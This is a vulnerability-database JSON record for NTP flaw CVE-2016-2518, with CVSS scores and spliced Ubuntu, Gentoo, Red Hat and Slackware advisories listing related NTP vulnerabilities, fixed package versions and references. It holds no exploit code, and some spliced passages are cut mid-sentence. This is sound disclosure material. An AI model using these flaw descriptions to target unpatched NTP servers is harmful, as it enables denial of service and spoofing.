"https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "NVD", "availabilityImpact": "PARTIAL", "baseScore": 5.0, "confidentialityImpact": "NONE", "exploitabilityScore": 10.0, "impactScore": 2.9, "integrityImpact": "NONE", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "Low", "accessVector": "Network", "authentication": "None", "author": "NVD", "availabilityImpact": "Partial", "baseScore": 5.0, "confidentialityImpact": "None", "exploitabilityScore": null, "id": "CVE-2016-2518", "impactScore": null, "integrityImpact": "None", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "Medium", "trust": 0.9, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "NVD", "availabilityImpact": "LOW", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "exploitabilityScore": 3.9, "impactScore": 1.4, "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "version": "3.1" }, { "attackComplexity": "Low", "attackVector": "Network", "author": "NVD", "availabilityImpact": "Low", "baseScore": 5.3, "baseSeverity": "Medium", "confidentialityImpact": "None", "exploitabilityScore": null, "id": "CVE-2016-2518", "impactScore": null, "integrityImpact": "None", "privilegesRequired": "None", "scope": "Unchanged", "trust": 0.8, "userInteraction": "None", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "version": "3.0" } ], "severity": [ { "author": "NVD", "id": "CVE-2016-2518", "trust": 1.8, "value": "MEDIUM" }, { "author": "CNNVD", "id": "CNNVD-201604-609", "trust": 0.6, "value": "MEDIUM" }, { "author": "VULMON", "id": "CVE-2016-2518", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "VULMON", "id": "CVE-2016-2518" }, { "db": "JVNDB", "id": "JVNDB-2016-007714" }, { "db": "NVD", "id": "CVE-2016-2518" }, { "db": "CNNVD", "id": "CNNVD-201604-609" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "The MATCH_ASSOC function in NTP before version 4.2.8p9 and 4.3.x before 4.3.92 allows remote attackers to cause an out-of-bounds reference via an addpeer request with a large hmode value. The NTP.org reference implementation of ntpd contains multiple vulnerabilities. NTP is prone to a denial-of-service vulnerability. \nAn attacker can exploit this issue to cause a denial-of-service condition, denying service to legitimate users. \nVersions prior to NTP 4.2.8p7 and 4.3.x versions prior to 4.3.92 are vulnerable. ==========================================================================\nUbuntu Security Notice USN-3096-1\nOctober 05, 2016\n\nntp vulnerabilities\n==========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 16.04 LTS\n- Ubuntu 14.04 LTS\n- Ubuntu 12.04 LTS\n\nSummary:\n\nSeveral security issues were fixed in NTP. A remote attacker could use this issue to perform a replay\nattack. (CVE-2015-7973)\n\nMatt Street discovered that NTP incorrectly verified peer associations of\nsymmetric keys. A remote attacker could use this issue to perform an\nimpersonation attack. (CVE-2015-7974)\n\nJonathan Gardner discovered that the NTP ntpq utility incorrectly handled\nmemory. This issue only affected Ubuntu 16.04\nLTS. (CVE-2015-7975)\n\nJonathan Gardner discovered that the NTP ntpq utility incorrectly handled\ndangerous characters in filenames. An attacker could possibly use this\nissue to overwrite arbitrary files. (CVE-2015-7976)\n\nStephen Gray discovered that NTP incorrectly handled large restrict lists. (CVE-2015-7977, CVE-2015-7978)\n\nAanchal Malhotra discovered that NTP incorrectly handled authenticated\nbroadcast mode. (CVE-2015-7979)\n\nJonathan Gardner discovered that NTP incorrectly handled origin timestamp\nchecks. A remote attacker could use this issue to spoof peer servers. \n(CVE-2015-8138)\n\nJonathan Gardner discovered that the NTP ntpq utility did not properly\nhandle certain incorrect values. (CVE-2015-8158)\n\nIt was discovered that the NTP cronjob incorrectly cleaned up the\nstatistics directory. A local attacker could possibly use this to escalate\nprivileges. (CVE-2016-0727)\n\nStephen Gray and Matthew Van Gundy discovered that NTP incorrectly\nvalidated crypto-NAKs. A remote attacker could possibly use this issue to\nprevent clients from synchronizing. A remote attacker could\npossibly use this issue to prevent clients from synchronizing. \n(CVE-2016-1548)\n\nMatthew Van Gundy, Stephen Gray and Loganaden Velvindron discovered that\nNTP incorrectly handled message authentication. (CVE-2016-1550)\n\nYihan Lian discovered that NTP incorrectly handled duplicate IPs on\nunconfig directives. (CVE-2016-4956)\n\nIn the default installation, attackers would be isolated by the NTP\nAppArmor profile. \n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 16.04 LTS:\n ntp 1:4.2.8p4+dfsg-3ubuntu5.3\n\nUbuntu 14.04 LTS:\n ntp 1:4.2.6.p5+dfsg-3ubuntu2.14.04.10\n\nUbuntu 12.04 LTS:\n ntp 1:4.2.6.p3+dfsg-1ubuntu3.11\n\nIn general, a standard system update will make all the necessary changes. 6.7) - i386, noarch, ppc64, s390x, x86_64\n\n3. \n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory GLSA 201607-15\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n https://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: Normal\n Title: NTP: Multiple vulnerabilities\n Date: July 20, 2016\n Bugs: #563774, #572452, #581528, #584954\n ID: 201607-15\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nMultiple vulnerabilities have been found in NTP, the worst of which\ncould lead to Denial of Service. \n\nAffected packages\n=================\n\n -------------------------------------------------------------------\n Package / Vulnerable / Unaffected\n -------------------------------------------------------------------\n 1 net-misc/ntp \u003c 4.2.8_p8 \u003e= 4.2.8_p8\n\nDescription\n===========\n\nMultiple vulnerabilities have been discovered in NTP. Please review the\nCVE identifiers referenced below for details. \n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll NTP users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=net-misc/ntp-4.2.8_p8\"\n\nReferences\n==========\n\n[ 1 ] CVE-2015-7691\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7691\n[ 2 ] CVE-2015-7692\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7692\n[ 3 ] CVE-2015-7701\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7701\n[ 4 ] CVE-2015-7702\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7702\n[ 5 ] CVE-2015-7703\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7703\n[ 6 ] CVE-2015-7704\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7704\n[ 7 ] CVE-2015-7705\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7705\n[ 8 ] CVE-2015-7848\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7848\n[ 9 ] CVE-2015-7849\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7849\n[ 10 ] CVE-2015-7850\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7850\n[ 11 ] CVE-2015-7851\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7851\n[ 12 ] CVE-2015-7852\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7852\n[ 13 ] CVE-2015-7853\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7853\n[ 14 ] CVE-2015-7854\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7854\n[ 15 ] CVE-2015-7855\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7855\n[ 16 ] CVE-2015-7871\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7871\n[ 17 ] CVE-2015-7973\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7973\n[ 18 ] CVE-2015-7974\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7974\n[ 19 ] CVE-2015-7975\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7975\n[ 20 ] CVE-2015-7976\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7976\n[ 21 ] CVE-2015-7977\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7977\n[ 22 ] CVE-2015-7978\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7978\n[ 23 ] CVE-2015-7979\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7979\n[ 24 ] CVE-2015-8138\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8138\n[ 25 ] CVE-2015-8139\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8139\n[ 26 ] CVE-2015-8140\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8140\n[ 27 ] CVE-2015-8158\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8158\n[ 28 ] CVE-2016-1547\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1547\n[ 29 ] CVE-2016-1548\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1548\n[ 30 ] CVE-2016-1549\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1549\n[ 31 ] CVE-2016-1550\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1550\n[ 32 ] CVE-2016-1551\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1551\n[ 33 ] CVE-2016-2516\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2516\n[ 34 ] CVE-2016-2517\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2517\n[ 35 ] CVE-2016-2518\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2518\n[ 36 ] CVE-2016-2519\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2519\n[ 37 ] CVE-2016-4953\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4953\n[ 38 ] CVE-2016-4954\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4954\n[ 39 ] CVE-2016-4955\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4955\n[ 40 ] CVE-2016-4956\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4956\n[ 41 ] CVE-2016-4957\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4957\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n https://security.gentoo.org/glsa/201607-15\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2016 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n\n\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Moderate: ntp security update\nAdvisory ID: RHSA-2016:1141-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://access.redhat.com/errata/RHSA-2016:1141\nIssue date: 2016-05-31\nCVE Names: CVE-2015-7979 CVE-2016-1547 CVE-2016-1548 \n CVE-2016-1550 CVE-2016-2518 \n=====================================================================\n\n1. Summary:\n\nAn update for ntp is now available for Red Hat Enterprise Linux 6 and Red\nHat Enterprise Linux 7. \n\nRed Hat Product Security has rated this update as having a security impact\nof Moderate. A Common Vulnerability Scoring System (CVSS) base score, which\ngives a detailed severity rating, is available for each vulnerability from\nthe CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Client (v. 7) - x86_64\nRed Hat Enterprise Linux Client Optional (v. 7) - noarch, x86_64\nRed Hat Enterprise Linux ComputeNode (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode Optional (v. 7) - noarch, x86_64\nRed Hat Enterprise Linux Desktop (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Desktop Optional (v. 6) - i386, noarch, x86_64\nRed Hat Enterprise Linux HPC Node (v. 6) - x86_64\nRed Hat Enterprise Linux HPC Node Optional (v. 6) - noarch, x86_64\nRed Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 6) - i386, noarch, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 7) - noarch, ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Workstation (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Workstation (v. 7) - x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 6) - i386, noarch, x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 7) - noarch, x86_64\n\n3. Description:\n\nThe Network Time Protocol (NTP) is used to synchronize a computer\u0027s time\nwith another referenced time source. These packages include the ntpd\nservice which continuously adjusts system time and utilities used to query\nand configure the ntpd service. \n\nSecurity Fix(es):\n\n* It was found that when NTP was configured in broadcast mode, a remote\nattacker could broadcast packets with bad authentication to all clients. \nThe clients, upon receiving the malformed packets, would break the\nassociation with the broadcast server, causing them to become out of sync\nover a longer period of time. (CVE-2015-7979)\n\n* A denial of service flaw was found in the way NTP handled preemptable\nclient associations. A remote attacker could send several crypto NAK\npackets to a victim client, each with a spoofed source address of an\nexisting associated peer, preventing that client from synchronizing its\ntime. (CVE-2016-1547)\n\n* It was found that an ntpd client could be forced to change from basic\nclient/server mode to the interleaved symmetric mode. A remote attacker\ncould use a spoofed packet that, when processed by an ntpd client, would\ncause that client to reject all future legitimate server responses,\neffectively disabling time synchronization on that client. (CVE-2016-1548)\n\n* A flaw was found in the way NTP\u0027s libntp performed message\nauthentication. An attacker able to observe the timing of the comparison\nfunction used in packet authentication could potentially use this flaw to\nrecover the message digest. (CVE-2016-1550)\n\n* An out-of-bounds access flaw was found in the way ntpd processed certain\npackets. An authenticated attacker could use a crafted packet to create a\npeer association with hmode of 7 and larger, which could potentially\n(although highly unlikely) cause ntpd to crash. (CVE-2016-2518)\n\nThe CVE-2016-1548 issue was discovered by Miroslav Lichvar (Red Hat). \n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1300271 - CVE-2015-7979 ntp: off-path denial of service on authenticated broadcast mode\n1331461 - CVE-2016-1547 ntp: crypto-NAK preemptable association denial of service\n1331462 - CVE-2016-1548 ntp: ntpd switching to interleaved mode with spoofed packets\n1331464 - CVE-2016-1550 ntp: libntp message digest disclosure\n1331468 - CVE-2016-2518 ntp: out-of-bounds references on crafted packet\n\n6. Package List:\n\nRed Hat Enterprise Linux Desktop (v. 6):\n\nSource:\nntp-4.2.6p5-10.el6.1.src.rpm\n\ni386:\nntp-4.2.6p5-10.el6.1.i686.rpm\nntp-debuginfo-4.2.6p5-10.el6.1.i686.rpm\nntpdate-4.2.6p5-10.el6.1.i686.rpm\n\nx86_64:\nntp-4.2.6p5-10.el6.1.x86_64.rpm\nntp-debuginfo-4.2.6p5-10.el6.1.x86_64.rpm\nntpdate-4.2.6p5-10.el6.1.x86_64.rpm\n\nRed Hat Enterprise Linux Desktop Optional (v. 6):\n\ni386:\nntp-debuginfo-4.2.6p5-10.el6.1.i686.rpm\nntp-perl-4.2.6p5-10.el6.1.i686.rpm\n\nnoarch:\nntp-doc-4.2.6p5-10.el6.1.noarch.rpm\n\nx86_64:\nntp-debuginfo-4.2.6p5-10.el6.1.x86_64.rpm\nntp-perl-4.2.6p5-10.el6.1.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node (v. 6):\n\nSource:\nntp-4.2.6p5-10.el6.1.src.rpm\n\nx86_64:\nntp-4.2.6p5-10.el6.1.x86_64.rpm\nntp-debuginfo-4.2.6p5-10.el6.1.x86_64.rpm\nntpdate-4.2.6p5-10.el6.1.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node Optional (v. 6):\n\nnoarch:\nntp-doc-4.2.6p5-10.el6.1.noarch.rpm\n\nx86_64:\nntp-debuginfo-4.2.6p5-10.el6.1.x86_64.rpm\nntp-perl-4.2.6p5-10.el6.1.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 6):\n\nSource:\nntp-4.2.6p5-10.el6.1.src.rpm\n\ni386:\nntp-4.2.6p5-10.el6.1.i686.rpm\nntp-debuginfo-4.2.6p5-10.el6.1.i686.rpm\nntpdate-4.2.6p5-10.el6.1.i686.rpm\n\nppc64:\nntp-4.2.6p5-10.el6.1.ppc64.rpm\nntp-debuginfo-4.2.6p5-10.el6.1.ppc64.rpm\nntpdate-4.2.6p5-10.el6.1.ppc64.rpm\n\ns390x:\nntp-4.2.6p5-10.el6.1.s390x.rpm\nntp-debuginfo-4.2.6p5-10.el6.1.s390x.rpm\nntpdate-4.2.6p5-10.el6.1.s390x.rpm\n\nx86_64:\nntp-4.2.6p5-10.el6.1.x86_64.rpm\nntp-debuginfo-4.2.6p5-10.el6.1.x86_64.rpm\nntpdate-4.2.6p5-10.el6.1.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 6):\n\ni386:\nntp-debuginfo-4.2.6p5-10.el6.1.i686.rpm\nntp-perl-4.2.6p5-10.el6.1.i686.rpm\n\nnoarch:\nntp-doc-4.2.6p5-10.el6.1.noarch.rpm\n\nppc64:\nntp-debuginfo-4.2.6p5-10.el6.1.ppc64.rpm\nntp-perl-4.2.6p5-10.el6.1.ppc64.rpm\n\ns390x:\nntp-debuginfo-4.2.6p5-10.el6.1.s390x.rpm\nntp-perl-4.2.6p5-10.el6.1.s390x.rpm\n\nx86_64:\nntp-debuginfo-4.2.6p5-10.el6.1.x86_64.rpm\nntp-perl-4.2.6p5-10.el6.1.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 6):\n\nSource:\nntp-4.2.6p5-10.el6.1.src.rpm\n\ni386:\nntp-4.2.6p5-10.el6.1.i686.rpm\nntp-debuginfo-4.2.6p5-10.el6.1.i686.rpm\nntpdate-4.2.6p5-10.el6.1.i686.rpm\n\nx86_64:\nntp-4.2.6p5-10.el6.1.x86_64.rpm\nntp-debuginfo-4.2.6p5-10.el6.1.x86_64.rpm\nntpdate-4.2.6p5-10.el6.1.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 6):\n\ni386:\nntp-debuginfo-4.2.6p5-10.el6.1.i686.rpm\nntp-perl-4.2.6p5-10.el6.1.i686.rpm\n\nnoarch:\nntp-doc-4.2.6p5-10.el6.1.noarch.rpm\n\nx86_64:\nntp-debuginfo-4.2.6p5-10.el6.1.x86_64.rpm\nntp-perl-4.2.6p5-10.el6.1.x86_64.rpm\n\nRed Hat Enterprise Linux Client (v. 7):\n\nSource:\nntp-4.2.6p5-22.el7_2.2.src.rpm\n\nx86_64:\nntp-4.2.6p5-22.el7_2.2.x86_64.rpm\nntp-debuginfo-4.2.6p5-22.el7_2.2.x86_64.rpm\nntpdate-4.2.6p5-22.el7_2.2.x86_64.rpm\n\nRed Hat Enterprise Linux Client Optional (v. 7):\n\nnoarch:\nntp-doc-4.2.6p5-22.el7_2.2.noarch.rpm\nntp-perl-4.2.6p5-22.el7_2.2.noarch.rpm\n\nx86_64:\nntp-debuginfo-4.2.6p5-22.el7_2.2.x86_64.rpm\nsntp-4.2.6p5-22.el7_2.2.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode (v. 7):\n\nSource:\nntp-4.2.6p5-22.el7_2.2.src.rpm\n\nx86_64:\nntp-4.2.6p5-22.el7_2.2.x86_64.rpm\nntp-debuginfo-4.2.6p5-22.el7_2.2.x86_64.rpm\nntpdate-4.2.6p5-22.el7_2.2.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode Optional (v. 7):\n\nnoarch:\nntp-doc-4.2.6p5-22.el7_2.2.noarch.rpm\nntp-perl-4.2.6p5-22.el7_2.2.noarch.rpm\n\nx86_64:\nntp-debuginfo-4.2.6p5-22.el7_2.2.x86_64.rpm\nsntp-4.2.6p5-22.el7_2.2.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 7):\n\nSource:\nntp-4.2.6p5-22.el7_2.2.src.rpm\n\nppc64:\nntp-4.2.6p5-22.el7_2.2.ppc64.rpm\nntp-debuginfo-4.2.6p5-22.el7_2.2.ppc64.rpm\nntpdate-4.2.6p5-22.el7_2.2.ppc64.rpm\n\nppc64le:\nntp-4.2.6p5-22.el7_2.2.ppc64le.rpm\nntp-debuginfo-4.2.6p5-22.el7_2.2.ppc64le.rpm\nntpdate-4.2.6p5-22.el7_2.2.ppc64le.rpm\n\ns390x:\nntp-4.2.6p5-22.el7_2.2.s390x.rpm\nntp-debuginfo-4.2.6p5-22.el7_2.2.s390x.rpm\nntpdate-4.2.6p5-22.el7_2.2.s390x.rpm\n\nx86_64:\nntp-4.2.6p5-22.el7_2.2.x86_64.rpm\nntp-debuginfo-4.2.6p5-22.el7_2.2.x86_64.rpm\nntpdate-4.2.6p5-22.el7_2.2.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 7):\n\nnoarch:\nntp-doc-4.2.6p5-22.el7_2.2.noarch.rpm\nntp-perl-4.2.6p5-22.el7_2.2.noarch.rpm\n\nppc64:\nntp-debuginfo-4.2.6p5-22.el7_2.2.ppc64.rpm\nsntp-4.2.6p5-22.el7_2.2.ppc64.rpm\n\nppc64le:\nntp-debuginfo-4.2.6p5-22.el7_2.2.ppc64le.rpm\nsntp-4.2.6p5-22.el7_2.2.ppc64le.rpm\n\ns390x:\nntp-debuginfo-4.2.6p5-22.el7_2.2.s390x.rpm\nsntp-4.2.6p5-22.el7_2.2.s390x.rpm\n\nx86_64:\nntp-debuginfo-4.2.6p5-22.el7_2.2.x86_64.rpm\nsntp-4.2.6p5-22.el7_2.2.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 7):\n\nSource:\nntp-4.2.6p5-22.el7_2.2.src.rpm\n\nx86_64:\nntp-4.2.6p5-22.el7_2.2.x86_64.rpm\nntp-debuginfo-4.2.6p5-22.el7_2.2.x86_64.rpm\nntpdate-4.2.6p5-22.el7_2.2.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 7):\n\nnoarch:\nntp-doc-4.2.6p5-22.el7_2.2.noarch.rpm\nntp-perl-4.2.6p5-22.el7_2.2.noarch.rpm\n\nx86_64:\nntp-debuginfo-4.2.6p5-22.el7_2.2.x86_64.rpm\nsntp-4.2.6p5-22.el7_2.2.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2015-7979\nhttps://access.redhat.com/security/cve/CVE-2016-1547\nhttps://access.redhat.com/security/cve/CVE-2016-1548\nhttps://access.redhat.com/security/cve/CVE-2016-1550\nhttps://access.redhat.com/security/cve/CVE-2016-2518\nhttps://access.redhat.com/security/updates/classification/#moderate\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2016 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD8DBQFXTUp2XlSAg2UNWIIRAqUmAKC32P98McZUqU1gzWxBbCz0hn0eagCfRtrx\nSULnKXrtTJd5iJ6eQVtDnxA=\n=hETy\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. \n\n\nHere are the details from the Slackware 14.1 ChangeLog:\n+--------------------------+\npatches/packages/ntp-4.2.8p7-i486-1_slack14.1.txz: Upgraded. \n This release patches several low and medium severity security issues:\n CVE-2016-1551: Refclock impersonation vulnerability, AKA: refclock-peering\n CVE-2016-1549: Sybil vulnerability: ephemeral association attack,\n AKA: ntp-sybil - MITIGATION ONLY\n CVE-2016-2516: Duplicate IPs on unconfig directives will cause an assertion\n botch\n CVE-2016-2517: Remote configuration trustedkey/requestkey values are not\n properly validated\n CVE-2016-2518: Crafted addpeer with hmode \u003e 7 causes array wraparound with\n MATCH_ASSOC\n CVE-2016-2519: ctl_getitem() return value not always checked\n CVE-2016-1547: Validate crypto-NAKs, AKA: nak-dos\n CVE-2016-1548: Interleave-pivot - MITIGATION ONLY\n CVE-2015-7704: KoD fix: peer associations were broken by the fix for\n NtpBug2901, AKA: Symmetric active/passive mode is broken\n CVE-2015-8138: Zero Origin Timestamp Bypass, AKA: Additional KoD Checks\n CVE-2016-1550: Improve NTP security against buffer comparison timing attacks,\n authdecrypt-timing, AKA: authdecrypt-timing\n For more information, see:\n http://support.ntp.org/bin/view/Main/SecurityNotice#Recent_Vulnerabilities\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7704\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8138\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1547\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1548\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1549\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1550\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1551\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2516\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2517\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2518\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2519\n (* Security fix *)\n+--------------------------+\n\n\nWhere to find the new packages:\n+-----------------------------+\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you. \n\nUpdated package for Slackware 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/ntp-4.2.8p7-i486-1_slack13.0.txz\n\nUpdated package for Slackware x86_64 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/ntp-4.2.8p7-x86_64-1_slack13.0.txz\n\nUpdated package for Slackware 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/ntp-4.2.8p7-i486-1_slack13.1.txz\n\nUpdated package for Slackware x86_64 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/ntp-4.2.8p7-x86_64-1_slack13.1.txz\n\nUpdated package for Slackware 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/ntp-4.2.8p7-i486-1_slack13.37.txz\n\nUpdated package for Slackware x86_64 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/ntp-4.2.8p7-x86_64-1_slack13.37.txz\n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/ntp-4.2.8p7-i486-1_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/ntp-4.2.8p7-x86_64-1_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/ntp-4.2.8p7-i486-1_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/ntp-4.2.8p7-x86_64-1_slack14.1.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/ntp-4.2.8p7-i586-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/ntp-4.2.8p7-x86_64-1.txz\n\n\nMD5 signatures:\n+-------------+\n\nSlackware 13.0 package:\n785dc2ef5f80edb28dc781e261c3fe3f ntp-4.2.8p7-i486-1_slack13.0.txz\n\nSlackware x86_64 13.0 package:\n899421096b7b63e6cb269f8b01dfd875 ntp-4.2.8p7-x86_64-1_slack13.0.txz\n\nSlackware 13.1 package:\ndfd34cbd31be3572a2bcae7f59cdfd91 ntp-4.2.8p7-i486-1_slack13.1.txz\n\nSlackware x86_64 13.1 package:\n63c4b31736040e7950361cd0d7081c8b 